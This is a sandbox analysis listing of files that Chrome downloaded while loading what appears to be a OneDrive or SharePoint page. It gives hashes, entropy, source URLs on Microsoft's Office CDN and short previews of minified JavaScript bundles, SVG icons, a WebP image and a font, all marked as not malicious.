                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[7],{5925:function(e,t,n){n.d(t,{a:function(){return D}});var a,i=n(37),r=n("tslib_102"),o=n("react-lib"),s=n(2518),c=n(82),d=n(33),l=n(127),u=n("fui.util_369"),f=n(141),p=n(1024),m=n(47),_=n(2529),h=(0,d.a)(),b="TextField",g=function(e){function t(t){var n=e.call(this,t)||this;n._textElement=o.createRef(),n._onFocus=function(e){n.props.onFocus&&n.props.onFocus(e),n.setState({isFocused:!0},function(){n.props.validateOnFocusIn&&n._validate(n.value)})},n._onBlur=function(e){n.props.onBlur&&n.props.onBlur(e),n.setState({isFocused:!1},function(){n.props.validateOnFocusOut&&n._validate(n.value)})},n._onRenderLabel=function(e){var t=e.label,a=e.required,i=n._classNames.subComponentStyles?n._classNames.subComponentStyles.label:void 0;return t?o.createElement(s.a,{required:a,htmlFor:n._id,styles:i,disabled:e.disabled,id:n._labelId},e.label):null},n._onRenderDescription=function(e){return e.description?o.createElement(
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (7071)
                                                  Category:downloaded
                                                  Size (bytes):7480
                                                  Entropy (8bit):5.3410875220789995
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:7B37B6BDEC712C0324B0D0E4C4BCC053
                                                  SHA1:4D918EE7D550E8FA829F7E0E994616FC6A5AF6AA
                                                  SHA-256:17956849689AF9662CD5909881F20E8027DFB53ECBA1BD6E5E20149761F10B95
                                                  SHA-512:19429A68E7689F23A8B1026CCF14A6035A4ACA587E1110F16A747FA57DBCD5CD71E43C9E23738D5CC71BA3794374C44A007393DFEDC68375CDA77F0A4CB094A5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/35998.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[35998],{335998:(e,t,n)=>{n.d(t,{OV:()=>p,XP:()=>y,YM:()=>a,lr:()=>v});var a,i=n(295610),r=n(633472),o=n(945018),s=n(650561),c=n(523499),d=n(224252),l=n(822866);!function(e){e[e.SuccessStatus=0]="SuccessStatus",e[e.NonSuccessStatus=1]="NonSuccessStatus",e[e.ParseFailure=2]="ParseFailure",e[e.InvalidArgument=3]="InvalidArgument",e[e.Exception=4]="Exception",e[e.Timeout=5]="Timeout",e[e.RetryAfter=6]="RetryAfter",e[e.Aborted=7]="Aborted"}(a||(a={}));var u=function(e,t){this.contentType=e,this.body=t},f=function(e){this.body=e};function p(e){return new f(e)}var m=function(e,t){this.contentType=e,this.body=t},_=function(e){this.parts=e},h=function(e,t){this.contentId=e,this.content=t},b=function(e,t,n){this.contentId=e,this.contentType=t,this.content=n},g=function(e,t,n){this.contentId=e,this.contentType=t,this.content=n},v={get:function(e,t){return D(e,"GET",t)},getAndParseResponse:function(e,t,
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (13520)
                                                  Category:downloaded
                                                  Size (bytes):17003
                                                  Entropy (8bit):5.5209957841495
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FE70DB957F02CC729FCAE2C733E4A9C5
                                                  SHA1:AC67FFD40287349D032827A9D83356B5534B166E
                                                  SHA-256:9030F5E71D501F63AB2F5D4265FF4E97BE7E51715298C80E0F69F4BC1599EE0B
                                                  SHA-512:55E4B4745D8EF17822FC1D1ACACD981FB790A490B30D97182EF235AF31A015E2D8E1FED7B9FF3030A0D9DD6A1837AA87B6DB1EC0FD8DD4A4FE52523BECDB717C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/44814.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[44814],{978458:(e,t,n)=>{n.d(t,{k:()=>r});var a=n(408156);const i=a.createContext(void 0);function r(e,t){return function(e,t,n){if(!e)return t;t={...t};const{generatedControlId:a,hintId:i,labelFor:r,labelId:o,required:s,validationMessageId:c,validationState:d}=e;var l,u,f,p,m,_,h,b,g,v,y,S,D;return a&&(null!==(u=(l=t).id)&&void 0!==u||(l.id=a)),!o||(null==n?void 0:n.supportsLabelFor)&&r===t.id||null!==(m=(f=t)[p="aria-labelledby"])&&void 0!==m||(f[p]=o),(c||i)&&(t["aria-describedby"]=[c,i,null==t?void 0:t["aria-describedby"]].filter(Boolean).join(" ")),"error"===d&&(null!==(h=(_=t)["aria-invalid"])&&void 0!==h||(_["aria-invalid"]=!0)),s&&((null==n?void 0:n.supportsRequired)?null!==(y=(v=t).required)&&void 0!==y||(v.required=!0):null!==(D=(S=t)["aria-required"])&&void 0!==D||(S["aria-required"]=!0)),(null==n?void 0:n.supportsSize)&&(null!==(g=(b=t).size)&&void 0!==g||(b.size=e.size)),t}(a.us
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (2839)
                                                  Category:dropped
                                                  Size (bytes):2889
                                                  Entropy (8bit):4.479970044378891
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4A8CF492FCA32B88F06601AD4A2C5C8F
                                                  SHA1:65466FF091FA1A5C34C19FA90D4DB922FBA7C40D
                                                  SHA-256:04023C62D146E9CA2E49240193CC29C4E145CEE2ECAAA2172FFAAE44E7195B4C
                                                  SHA-512:E1763199B4FA033950AB871F1C9B4C8F9A36EF23299EA08CB6A51BBB71CC5F063E62639AEA0ADAD921BB8F43738BA8F8D4BF28029C9BF4E3A2873CB8B0A39CC8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[13],{8043:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return r},c:function(){return c},d:function(){return o},e:function(){return s}});var a=n(5901);const i=(0,a.a)("Notepad20Regular","20",["M7.5 7a.5.5 0 0 0 0 1h5a.5.5 0 0 0 0-1h-5ZM7 10.5c0-.28.22-.5.5-.5h5a.5.5 0 0 1 0 1h-5a.5.5 0 0 1-.5-.5Zm.5 2.5a.5.5 0 0 0 0 1h2a.5.5 0 0 0 0-1h-2Zm-1-11a.5.5 0 0 0-.5.5V3h-.5C4.67 3 4 3.67 4 4.5v12c0 .83.67 1.5 1.5 1.5h6a.5.5 0 0 0 .35-.15l4-4a.5.5 0 0 0 .15-.35v-9c0-.83-.67-1.5-1.5-1.5H14v-.5a.5.5 0 0 0-1 0V3h-2.5v-.5a.5.5 0 0 0-1 0V3H7v-.5a.5.5 0 0 0-.5-.5Zm8 2c.28 0 .5.22.5.5V13h-2.5c-.83 0-1.5.67-1.5 1.5V17H5.5a.5.5 0 0 1-.5-.5v-12c0-.28.22-.5.5-.5h9Zm-.2 10L12 16.3v-1.8c0-.28.22-.5.5-.5h1.8Z"]),r=(0,a.a)("Open20Regular","20",["M6 4a2 2 0 0 0-2 2v8c0 1.1.9 2 2 2h8a2 2 0 0 0 2-2v-2.5a.5.5 0 0 1 1 0V14a3 3 0 0 1-3 3H6a3 3 0 0 1-3-3V6a3 3 0 0 1 3-3h2.5a.5.5 0 0 1 0 1H6Zm5-.5c0-.28.22-.5.5-.5h5c.28 0 .5.22
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):4344
                                                  Entropy (8bit):4.600206864331567
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:21FE59ABBEF7846A168756F70F86D474
                                                  SHA1:234300619EF6F45C283519D1CECAEF35D993D22A
                                                  SHA-256:24CA84EA30978DF792133B8DC40B5D0E0D0DFFB307236BA082AF1A8F2151C3AB
                                                  SHA-512:9888490817A48D43D45AC909ADC624187AA1E33CF07524611FDA66B5C4CE84F4801E1930D1988916D7F8883324ECE61899F72D85F2955B7ADD0158FD980995F6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/error/error_shared_dark.svg
                                                  Preview:<svg width="160" height="160" viewBox="0 0 160 160" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1003_114861)">..<path d="M139.501 59.0999L105.201 93.6999C103.201 95.6999 104.101 99.2 106.901 99.9L154.001 112.4C156.801 113.1 159.301 110.6 158.601 107.8L145.801 60.7999C144.901 57.9999 141.501 56.9999 139.501 59.0999Z" fill="url(#paint0_linear_1003_114861)"/>..<path d="M39.6999 19.9L19.2999 64.2C18.0999 66.8 20.1999 69.7 22.9999 69.5L71.4999 65C74.3999 64.7 75.8999 61.5 74.1999 59.1L46.0999 19.3C44.3999 16.9 40.8999 17.3 39.6999 19.9Z" fill="url(#paint1_linear_1003_114861)"/>..<path d="M78.5007 26.0999L19.6007 113.4C16.1007 118.5 19.5007 125.5 25.7007 126L130.801 133.4C137.001 133.8 141.301 127.4 138.601 121.8L92.4007 27.0999C89.7007 21.4999 82.0007 20.9999 78.5007 26.0999Z" fill="#E7C380"/>..<path d="M80.5012 97.1C78.3012 96.9 76.6012 95 76.8012 92.8L79.7011 51.9C79.9011 49.7 81.8012 48 84.0012 48.2C86.2012 48.4 87.9011 50.3 87.7011 52.5L84.8012 93.4C84.6012
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):376
                                                  Entropy (8bit):5.105778459405452
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:CD458D593C42684E66D7C5E4F4EC0312
                                                  SHA1:605E3855F2885272B45E61A5005190F5E79152AE
                                                  SHA-256:89AB0C7E984E074398B01ECC380631A5E60EF14E133221779745F11F4EEFE321
                                                  SHA-512:A179B6F104EFD05D05B679FD263ED06A28CE2020D740066838BFE32E402941A87C49A1D7D5559649DAC6C6D4C6DC47542C8EB71F789CE8D093737E251039A92F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/addtoonedrive/shortcutbadge_20.svg
                                                  Preview:<svg width="20" height="20" viewBox="0 0 20 20" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="20" height="20" rx="4" fill="white"/>..<path d="M6 5H15M15 5V14M15 5L5 15" stroke="#0F6CBD" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"/>..<rect x="0.7" y="0.7" width="18.6" height="18.6" rx="3.3" stroke="#999897" stroke-width="1.4"/>..</svg>..
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image
                                                  Category:downloaded
                                                  Size (bytes):36146
                                                  Entropy (8bit):7.99251324975053
                                                  Encrypted:true
                                                  SSDEEP:
                                                  MD5:E243D03BB4BDFB80FC2B9C40863299C5
                                                  SHA1:7ABEBA96529B293239DA5536D4260EFA1E797AD9
                                                  SHA-256:A8283E1B2CABD16BE04A6CB0A292E532D5B74520123E09C2CD9DEB9ECCF2D1EB
                                                  SHA-512:7BDA56879F1873647EDF1B3D18E468430FA9A03AC88E8AC5209E834DE13B7C0FD195F684F7AFDE8E526B4993C1DEBCDF6373357B925B423AFCC37D76EE5C0F41
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/images/error/error_exclamation_v3_dark.webp
                                                  Preview:RIFF*...WEBPVP8X..............ALPH.a.....n..l/usM....=!.....J.j.!....I6.."..D4Il.l...w.@f......x..$..6Y..m.u.x..U.............$.@.9..M......"b......Q..)S.|..7.r.3....M[.....U..Z%..>.F.m$I....?..S...^..1.W...l.n.H.@.../..G.._.$.m.Nos.}.>1CN5P..2.@J..J.T.fffffffff.{...a5.5Zk..u..&#..$.v...}....{.14..k.I..X....H#.b..e............e..eff23.%.p..*.2......Y.$.ms....hn.HI.b.{]~.........H..m.c..t.....z....C.L... \.HBx.HZw+".7....... ,9..xv.A........A.G.0..g..."Nw.pBt..kE.....Qb.....i.A<..p....ax..+,.......4..H............(..c..."g.....8J.K[....g..4...&.(Y>.o...t|W..=...s...&\.[?.&B.&..'.QKV...x.....1i....T3...........&>S.H;..._......c..?y..r...........x.GmI.PR/.4#.w..Bx...."h.u...G..........n.D......`.x.m..ui~.q....2....u...O..f.u.F..O.B=.m.B^....R...*...x.t..&..V..r....d$.z\<?5..7I..Z....E...q.T..GbM..t.".H..l?L.@...<.~.+]?.I...>.E..t^...q..|H....h..](..Gcx..\..|...t.!.GcR..Q..H.2...j.t....&..`..j...D1Q*.^d.Z.;v.g...:...o..h..I.qI.M...\...q
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (65457)
                                                  Category:downloaded
                                                  Size (bytes):141219
                                                  Entropy (8bit):5.330456313460217
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:011539494759FBAAE745C4E8D4F2AABF
                                                  SHA1:C1127E596ED47FF68721D8B679ED6604E4318684
                                                  SHA-256:DCAB75ECDDDDEAFC14296ADB17BEED67A88FA52559A4596A26D2EA0F95FA67F4
                                                  SHA-512:E9F603BC2B2E0B7899886208D7B28B373DC777D7682B15B457A658AE8383257B0346F5FFF32E727631A78B67EB717C420A9F9F9D79B6B69227E50430AB20E54D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp.1ds/odsp.1ds.lib-923e3d9a.js
                                                  Preview:/*! For license information please see odsp.1ds.lib-923e3d9a.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.1ds.lib"],{"1ds-lib":function(e,t,n){n.r(t),n.d(t,{_InMemoryPropertyStorage:function(){return Ls},_OneDSLogger:function(){return As}});var a={};n.r(a),n.d(a,{optionalDiagnostic:function(){return fs},requiredDiagnostic:function(){return us},requiredService:function(){return ps}});var i=function(e,t){return i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},i(e,t)};function r(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function n(){this.constructor=e}i(e,t),e.prototype=null===t?Object.create(t):(n.prototype=t.prototype,new n)}var o=function(){return o=Object.assign||function(e){for(var t,n=1,a=arguments.length;n<a;n++)for(var i i
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Web Open Font Format, TrueType, length 15620, version 1.3277
                                                  Category:downloaded
                                                  Size (bytes):15620
                                                  Entropy (8bit):7.977072668407957
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:13CAD08522692478254587EB15D731AB
                                                  SHA1:3853A2216149DF4585C6A7D85FAF0E41E3EFCF7E
                                                  SHA-256:4E22396EA0929D74DB59A60485B657DE91A28501068BCF6FB0D63D73FA40C826
                                                  SHA-512:24936F68B177B74168CC88BED57B64359FB80BF6135690B1D3BE12207AAF3683E12133F872E0053CEDAB7825B9D3565C1450D0D90C0270521088C612AC6ADF43
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-16-da681b0c.woff
                                                  Preview:wOFF......=.......qp........................OS/2.......G...`;.r.cmap...P.......b).!.gasp...@............glyf...L..5c..b\.Ns]head..7....5...6#.hhea..7........$....hmtx..8....a........loca..8h...........Vmaxp..94....... .w..name..9L.......O..R.post..<........ ....x.c`a..8...........L..t.!.I.(......@9......VP`p.<.K/...!...X <....RX...x...=K.a....`&..H.6!q...p.!.....]..>AD{_ ..h.h. ....V`4.9K/...o......r..p.,a...m...........,i...y.S..W..-.x..6..'...7~.K...JiXi.)...5...T..u.Ef].9/.v.O{..>.......l...k.Q.M.c#..v....PG..XF.KX...(b.S..?..9dCg..o#.Q.C..|...........r.U.............x..|y|...U..kFskNM.).4#iF.....%..-..a.....L.L8l.;.&..&Y.!.B.!$0Y !!$../!.....$.....[.....HvL..?~..............."...v/......:.......'...............*.:..(.'B.#...k..../.e,...LF.......`.$Y..I.G..F.rn.G.............4..,.h+S..&Zi...B..l..j............Wo...X.M..,......a..]xr..;..Kuy%...vS-[@M.yz......|nsSs...b.+..t..w..........+..V.E../Z_...F.NC3:...|ue.*J..7xmu6s...|..4T...\.9..kP..1d.&
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3858)
                                                  Category:downloaded
                                                  Size (bytes):4307
                                                  Entropy (8bit):5.246679212479589
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4982268339E6F0C305AC201B48F52B3E
                                                  SHA1:BF8FEC7C2D319EEC12A1D0AE4B23C08F95BBCF21
                                                  SHA-256:5AD1A476302EACC0F2676E9F7D7F468CE111868A03BD09A5D1632294B6B03E12
                                                  SHA-512:31AEBEE1EF07FB1E3FF652F6DA1456066199D7577663E8B26993D96A09E37279948AA246B4ED7BFBD8E49C41CD41F01AAC67E406DE48D9AFFE70555568455747
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/onePlayer.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[11657],{561499:(e,t,n)=>{n.r(t),n.d(t,{createOnePlayer:()=>l,loadMtcManager:()=>s.s,onePlayerVersion:()=>r._,prefetchManifest:()=>c.g,prefetchManifestLite:()=>c.H,prewarmResources:()=>o.G,stringToMediaVisibility:()=>d.r});var a=n(782849),i=n(478099),r=n(46227),o=n(139694),s=n(875961),c=n(742245),d=n(694991);function l(e){return new a.G(e,i.hl)}}.,636221:(e,t,n)=>{n.r(t),n.d(t,{createIc3AmsOnePlayer:()=>v,createOdspOnePlayer:()=>g,createOdspOnePlayerWithoutPlugins:()=>b,loadMtcManager:()=>_.s,onePlayerVersion:()=>p._,prefetchManifest:()=>h.g,prewarmResources:()=>m.G});var a=n(295610),i=n(782849),r=n(741222),o=n(422058),s=n(73413),c=n(82999),d={mediaType:"video"},l=function(){function e(e,t){this.options=e,this.telemetryContext=t,this._itemTitle=new c.m(void 0),this._captionsAvailable=new c.m(void 0),this._audioFiles=new c.m(void 0),this.loadDataForPhase=function(e){return Promise.resolve()};v
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (12139)
                                                  Category:dropped
                                                  Size (bytes):28157
                                                  Entropy (8bit):5.42061725575881
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9255F1D6CA19F506FA5E77E7BDA78147
                                                  SHA1:0178BB1B94DD74B8CB375756CDD242568099CE1D
                                                  SHA-256:74DD9DFF52BEF839BF56080F3B12D4579DD53FA1552950BCCD4C1C60E0F6A6E5
                                                  SHA-512:EE7D49C514073B03DC1824AFCDDF58F7860C144AF45385409B2BA8ABC76DA98E20B4B371B9CF40BB1C5FF09FFCE8DE151867AA8531B50FBE9B13A7A445F3B7D8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[296],{5771:function(e,t,n){n.d(t,{a:function(){return o}});var a=n(2),i=n(77),r=new i.b("externalItem",{url:i.d}),o=new a.a(r)}.,5867:function(e,t,n){n.d(t,{a:function(){return ie}});var a=n("tslib_102"),i=n(21),r=n(67),o=n(5),s=n(22),c=n(72),d=n(29),l=n(268),u=n(337),f=n(102),p=n(90),m=n(7962),_=n(5868),h=n(5869),b=n(6),g=n(55),v=n(1723),y=n(24),S=n(41),D=n(1629),I=n(515),x=(0,i.e)()(function(e){var t=this;return function(n){return(0,a.Zd)(t,void 0,void 0,function(){var t,i,r,c,d,u,f,S,x,w,E,A,L;return(0,a.qr)(this,function(k){return t=l.a.deserialize(e.itemKey).tenantRootUrl,i=new g.a,r=n((0,y.a)(C)),c=n((0,y.a)(O)),d=_.a.serialize({tenantRootUrl:t}),u=h.a.serialize({tenantRootUrl:t}),f=D.a.serialize({tenantRootUrl:t}),S=I.a.serialize({tenantRootUrl:t}),x=c?[S]:[d,u],w=(0,a.W_)((0,a.W_)({},c?((E={})[S]=(0,a.W_)((0,a.W_)((0,a.W_)({},p.f.pack(!0)),o.m.pack(m.c)),b.Cc.pack({itemKey:e.itemKey})),E):((A={})[d]=(
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (11745)
                                                  Category:downloaded
                                                  Size (bytes):18010
                                                  Entropy (8bit):5.364607100455491
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:E19035A0CF5D1EB0F7506C8C69685EE2
                                                  SHA1:BB14E2E201979187E93C730B29C068D4F5BAB03C
                                                  SHA-256:462E6EA399214A139D0A5A18593791E74E5D074BA5856229FCFE3446C7549C4D
                                                  SHA-512:72ABF3E41AA196D8BCD44FF51FDDCC767E86EA4BC5B2B0D0A7F35E3E1CFA0D7F714CCBBFB910BC2D9CA3753EF280971F99AE7F7F7310E41875F3CF4BBD4EA1C9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/17840.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[17840],{714776:(e,t,n)=>{n.d(t,{Yk:()=>s,hD:()=>o,hN:()=>d,oC:()=>c,r6:()=>r,y$:()=>l});var a,i=n(229386),r=function(e){return(0,i.Z)({accordionContainer:{marginTop:10},debugCommandBar:{paddingLeft:8,borderBottomStyle:"solid",borderBottomWidth:1,borderBottomColor:e?e.palette.neutralSecondaryAlt:""},debugCommandBarItem:{padding:8,paddingTop:14,paddingBottom:14},debugCommandBarIcon:{margin:"0px 4px",lineHeight:"16px",textAlign:"center",flexShrink:"0",fontSize:"20px",color:e?e.palette.themePrimary:""},debugMessageBar:{width:"auto",color:e?e.palette.neutralPrimary:""},scrollableContent:{overflowX:"hidden",overflowY:"auto",paddingLeft:16,paddingRight:16,paddingBottom:16},descriptiveText:{paddingTop:16,color:e?e.palette.neutralSecondaryAlt:""},developerTools:{paddingTop:16},title:{marginTop:5,marginBottom:5},toggle:{marginBottom:0},toggleSubtitleIcon:{paddingRight:4,fontSize:12},toggleSubtitle:{fo
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (35504)
                                                  Category:dropped
                                                  Size (bytes):36086
                                                  Entropy (8bit):5.395264939007949
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:62E449D90AAF4D4849B51382E29F6879
                                                  SHA1:2CC9D33DBAFEA1064779FC662380794BE5B6012E
                                                  SHA-256:8F67077C02517A1FEE55CAFEDF6E7E1B566236E874A0A01BCB7B46D44AB24DA0
                                                  SHA-512:52D077A61177267E403200716B5F9451163E4F13BBA927B51CD3580696E3C2E8368C7B2EFCAF325C7FF18201D4FE52FE8D910D6E3A482A05F9764DEDC16F39AE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[318],{5936:function(e,t,n){n.d(t,{a:function(){return s},b:function(){return c}});var a=n(1),i=n(5937),r=n(902),o=n(25),s=new a.a("itemSetNavCommandGroups",{commandGroups:a.b}),c=new a.a("itemSetNav",{childKeys:a.b,isResolved:a.b,error:a.b,navAs:(0,o.b)(),commandGroupsControlHandler:(0,a.c)(s),selectedKeyControlHandler:(0,a.c)(i.a),navGroupControlHandler:(0,a.c)(r.a)})}.,5937:function(e,t,n){n.d(t,{a:function(){return i}});var a=n(1),i=new a.a("itemSetNavSelectedKey",{currentSelectedKey:a.b})}.,2313:function(e,t,n){n.r(t),n.d(t,{leftNavContentControlHandler:function(){return en}});var a=n("react-lib"),i=n(112),r=n(2104),o=n(902),s=n(5936),c=n(899),d=n("tslib_102"),l=n(3),u=n(68),f=n(22),p=n(5),m=n(114),_=n(903),h=n(904),b=n(1643),g=n(5937),v=n(11),y=n(97),S=n(86),D=n("fui.util_369"),I=(0,D.dY)(function(e){var t=this;return function(n,a){return(0,d.Zd)(t,void 0,void 0,function(){return(0,d.qr)(this,function(t)
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4825)
                                                  Category:downloaded
                                                  Size (bytes):4830
                                                  Entropy (8bit):5.277916375313661
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:263BE3284A357FA5F713A29D6335953C
                                                  SHA1:92B68DA21E206100B870FCC2AD8A41D59FCE9829
                                                  SHA-256:4981E39BE6FE4128DE58267BA3E1BFC19E84CFACD85CF35F49529D394992893E
                                                  SHA-512:2D6C21D7C468A608B578D9D72516535758F79A405B6962C34CD38F1F5223B2562385CA2EF47AFBC32C51AAB605E2A19EDC5B93AD3D80D56816395B03AE000D9D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/94155.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[94155],{194155:(e,t,n)=>{n.d(t,{h5:()=>y});const a=["Top","Right","Bottom","Left"];function i(e,t,...n){const[i,r=i,o=i,s=r]=n,c=[i,r,o,s],d={};for(let n=0;n<c.length;n+=1)(c[n]||0===c[n])&&(d[e+a[n]+t]=c[n]);return d}function r(...e){return i("border","Width",...e)}function o(...e){return i("border","Style",...e)}function s(...e){return i("border","Color",...e)}const c=["none","hidden","dotted","dashed","solid","double","groove","ridge","inset","outset"];function d(e){return c.includes(e)}const l=e=>"number"==typeof e&&!Number.isNaN(e),u=e=>"auto"===e,f=["content","fit-content","max-content","min-content"],p=e=>f.some(t=>e===t)||(e=>"string"==typeof e&&/(\d+(\w+|%))/.test(e))(e),m=/var\(.*\)/gi,_=/^[a-zA-Z0-9\-_\\#;]+$/,h=/^-moz-initial$|^auto$|^initial$|^inherit$|^revert$|^unset$|^span \d+$|^\d.*/;function b(e){return void 0!==e&&"string"==typeof e&&_.test(e)&&!h.test(e)}const g=["-moz-ini
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (17997)
                                                  Category:downloaded
                                                  Size (bytes):41118
                                                  Entropy (8bit):5.536509877819653
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B9393820501170A3F6DF695CC021FB09
                                                  SHA1:212DD2722A0E8E66C161EAD3752DD92B8E165711
                                                  SHA-256:9FE905C2ACE6AF9135B52D7AABD69A57EBD02B2150539519BDD90972B27FE761
                                                  SHA-512:C7B1A46A42E5F20784C9717DE55F110FC927C7C05914A9AC8FAE5058C83C13E546B16C1AD1E836746F82F11979E8408038A79EA78B13E273441147663CA9B208
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/14727.js
                                                  Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[14727],{738280:(e,t,n)=>{n.d(t,{V:()=>r});var a,i=/^data:((?:\w+\/(?:(?!;).)+)?)((?:;[\w\W]*?[^;])*),(.+)$/;!function(e){e[e.absolute=0]="absolute",e[e.relative=1]="relative",e[e.serverRelative=2]="serverRelative",e[e.dataUrl=3]="dataUrl"}(a||(a={}));var r=function(e,t){var n;void 0===e&&(e="");var r=null!==(n=null==t?void 0:t.allowDataUrl)&&void 0!==n&&n,o=e.indexOf("//"),s=e.indexOf("/"),c=o>-1&&o<=s?o+"//".length:-1,d=function(e,t){if(t>-1){var n=e.indexOf("/",t);return n>-1?e.slice(0,n):e}return""}(e,c),l=d&&d.slice(c),u=e.slice(d.length),f=d?a.absolute:r&&i.test(e)?a.dataUrl:"/"===u[0]?a.serverRelative:a.relative,p=u.split("/");this.authority=d,this.domain=l,this.format=f,this.path=u,this.segments=p,this.value=e}}.,193874:(e,t,n)=>{n.d(t,{$r:()=>p,AT:()=>s,B_:()=>_,GX:()=>u,Jk:()=>b,LY:()=>h,PN:()=>l,Rv:()=>S,Ve:()=>d,aP:()=>c,bJ:()=>D,cq:()=>g,dW:()=>m,gp:()=>v,it:()=>r,ne:()=>o,uV:()=
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (4078)
                                                  Category:downloaded
                                                  Size (bytes):7191
                                                  Entropy (8bit):5.135156301738665
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6007C79B3E3A8929AFF9144179E34F27
                                                  SHA1:B3784C48E523A74F94C4FCF6DD72ECB4CE0AE907
                                                  SHA-256:C02D621D4EC6794F2E853DBC2C4E122ED2F0E5AB61363630FE9008B5691DD45C
                                                  SHA-512:C0E06BAFF1845FB0DC1AED2DFA4AAEA742247781F345536EE994193A84EA6958FE0C619E5498C8825B5CE2D6B344EDCB05393B6430F13307B20A442427C6B740
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/@ms/stream-bundle/chunks/92847.js
